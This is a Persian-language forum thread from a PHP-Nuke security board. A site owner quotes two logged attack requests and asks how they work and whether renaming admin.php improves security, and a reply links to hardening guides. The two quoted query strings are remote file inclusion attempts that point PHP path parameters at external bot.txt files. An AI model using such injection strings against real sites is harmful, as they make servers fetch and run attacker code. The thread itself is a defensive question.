پرسشي در باره كدهاي حمله

مسائل امنیتی مربوط به نیوک 8.0
نمایه کاربر
dijavoo
کاربر جدید
کاربر جدید
پست: 31
تاریخ عضویت: سه شنبه 21 خرداد 1387, 12:00 am

پرسشي در باره كدهاي حمله

پست توسط dijavoo » دو شنبه 4 شهریور 1387, 2:06 am

با سلام

نگهبان سايت من ديروز 2 مورد حمله با سايت رو از نوع فيلتر گزارش و آي پي هاي حمله كننده رو مسدود كرد:

كيوري هاي ارسالي عبارت بودند از:

کد: انتخاب همه

//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://audi.spb.ru/img/gal/2008/bot.txt??
و

کد: انتخاب همه

//index.php?mosConfig_absolute_path=http://vcd.co.uk/uploadfiles/bot.txt??

مي خواستم بپرسم اين نوع حملات عملكردشون به چه صورت هست و من چطور می تونم مطمئن شم که این حملات بی اثر بودند وديگه اينكه با توجه به اينكه ليست فايل ها و فولدر ها در نيوك حالت روتين داره ايا تغيير نام بعضي فايل هاي اصلي مثل admin.php و امثالهم می تونه در امنیت نیوک موثر باشه؟ و اگر پاسخ مثبته علاوه بر تغییر نام فایلهای مورد نظر دیگه کجا ها رو باید تغییر بدیم؟

مثلا می دوتم که اگر admin.php رو تغییر نام بدم باید در فایل config.php هم این تغییر نام رو منظور کنم اما مطمئن نیستم کافی باشه
با تشکر از همه عزیزان


نمایه کاربر
irteam_online
کاربر خیلی فعال
پست: 5150
تاریخ عضویت: پنج شنبه 9 فروردین 1386, 6:51 am
محل اقامت: root
تشکر کرده: 108 دفعه
تشکر شده: 2002 دفعه
تماس:

پست توسط irteam_online » دو شنبه 4 شهریور 1387, 2:47 pm

آموزش تغيير فايل ادمين در سايت است

در مورد امنيت هم نگران نباشيد ـ در امضاي بنده يك ليكي است به نام امنيت با Htacces که آن را نیز مطالعه کنید .
موضوع جدید ارسال پست

بازگشت به “مسائل امنیتی”